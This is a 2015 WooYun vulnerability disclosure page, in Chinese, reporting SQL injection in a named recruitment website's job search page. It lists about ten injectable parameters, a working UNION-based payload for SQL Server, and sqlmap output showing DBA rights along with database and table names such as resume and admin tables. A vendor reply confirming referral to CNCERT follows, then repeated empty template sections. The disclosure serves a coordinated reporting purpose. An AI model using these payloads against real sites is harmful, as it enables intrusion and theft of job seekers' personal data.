花都人才网SQL注入（多参数涉及大量数据DBA权限

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122753

漏洞标题：花都人才网SQL注入（多参数涉及大量数据DBA权限

漏洞作者：路人甲

提交时间：2015-06-29 16:12

修复时间：2015-08-15 09:28

公开时间：2015-08-15 09:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-29：细节已通知厂商并且等待厂商处理中
2015-07-01：厂商已经确认，细节仅向厂商公开
2015-07-11：细节向核心白帽子及相关领域专家公开
2015-07-21：细节向普通白帽子公开
2015-07-31：细节向实习白帽子公开
2015-08-15：细节向公众公开

简要描述：

详细说明：

post注入

http://www.job088.com/jobsearch.php?areaid=*&edu=&exp=&job1=&job1_son=&keyword=&salary=&sex=&tid=611&type=
注入点：
areaid参数
edu参数
exp参数
job1参数
job_son参数
keyword参数
salary参数
sex参数
tid参数
type参数

漏洞证明：

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (random number) - 11 columns
    Payload: http://www.job088.com:80/jobsearch.php?areaid=-6908 UNION ALL SELECT 6991,CHAR(113)+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(65)+CHAR(111)+CHAR(77)+CHAR(89)+CHAR(116)+CHAR(113)+CHAR(101)+CHAR(84)+CHAR(89)+CHAR(90)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(118)+CHAR(113),6991,6991,6991,6991,6991,6991,6991,6991,6991-- 21=6 AND 983=983&edu=&exp=&job1=&job1_son=&keyword=&salary=&sex=&tid=611&type=
    Vector:  UNION ALL SELECT 8528,[QUERY],8528,8528,8528,8528,8528,8528,8528,8528,8528-- 
---
web server operating system: Windows
web application technology: PHP 5.2.6, ASP.NET
back-end DBMS: Microsoft SQL Server 2005
current user:    'hdadmin2013'
current database:    'job0881'
current user is DBA:    True
available databases [9]:
[*] hdrc22
[*] job0881
[*] kf
[*] master
[*] model
[*] msdb
[*] ReportServerTempDB
[*] tempdb
[*] train
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (random number) - 11 columns
    Payload: http://www.job088.com:80/jobsearch.php?areaid=-6908 UNION ALL SELECT 6991,CHAR(113)+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(65)+CHAR(111)+CHAR(77)+CHAR(89)+CHAR(116)+CHAR(113)+CHAR(101)+CHAR(84)+CHAR(89)+CHAR(90)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(118)+CHAR(113),6991,6991,6991,6991,6991,6991,6991,6991,6991-- 21=6 AND 983=983&edu=&exp=&job1=&job1_son=&keyword=&salary=&sex=&tid=611&type=
    Vector:  UNION ALL SELECT 4700,[QUERY],4700,4700,4700,4700,4700,4700,4700,4700,4700-- 
---
web server operating system: Windows
web application technology: PHP 5.2.6, ASP.NET
back-end DBMS: Microsoft SQL Server 2005
Database: job0881
[69 tables]
+----------------------+
| BUSINESS_SHOP        |
| Customer             |
| PERS_USER            |
| RESUME_BASIC         |
| RESUME_BASIC         |
| RESUME_CERT          |
| RESUME_HOPE          |
| RESUME_PROJECT       |
| RESUME_READ          |
| RESUME_SKILL         |
| RESUME_TRAIN         |
| RESUME_WORK          |
| USERID_JOB           |
| advertise            |
| article_images       |
| article_images       |
| bl                   |
| class_advertise      |
| class_advertise      |
| cmd                  |
| comid                |
| company_job          |
| company_job          |
| dictionary           |
| friendslink          |
| gg                   |
| history              |
| jobconfig14          |
| jobconfig14          |
| jobpost14            |
| jobpost14            |
| map                  |
| news_base            |
| news_cont            |
| p_record             |
| pangolin_test_table  |
| records              |
| sms_date             |
| sqlmapoutput         |
| sumposition          |
| systemc              |
| town                 |
| user_message         |
| userid_favorite      |
| v_areas              |
| v_bus                |
| v_company_job1       |
| v_company_job_list   |
| v_company_job_list   |
| v_company_job_list   |
| v_company_job_search |
| v_entCat             |
| v_indCat             |
| v_jobClass           |
| v_news_base          |
| v_news_base          |
| v_news_image         |
| v_news_type          |
| v_proClass           |
| v_resume_search      |
| v_resume_search      |
| v_userid_resume      |
| wx_job               |
| 个人信箱                 |
| 个人资料                 |
| 公司信箱                 |
| 公司资料                 |
| 招聘信息                 |
| 管理员                  |
+----------------------+

大量数据，DBA权限，就不深入了

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-07-01 09:26

厂商回复：

CNVD确认并复现所述漏洞情况，已经转由CNCERT下发给广东分中心，由广东分中心后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122753

漏洞标题：花都人才网SQL注入（多参数涉及大量数据DBA权限

相关厂商：花都人才网

漏洞作者：路人甲

提交时间：2015-06-29 16:12

修复时间：2015-08-15 09:28

公开时间：2015-08-15 09:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122753

漏洞标题：花都人才网SQL注入（多参数涉及大量数据DBA权限

相关厂商：花都人才网

漏洞作者： 路人甲

提交时间：2015-06-29 16:12

修复时间：2015-08-15 09:28

公开时间：2015-08-15 09:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0122753"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云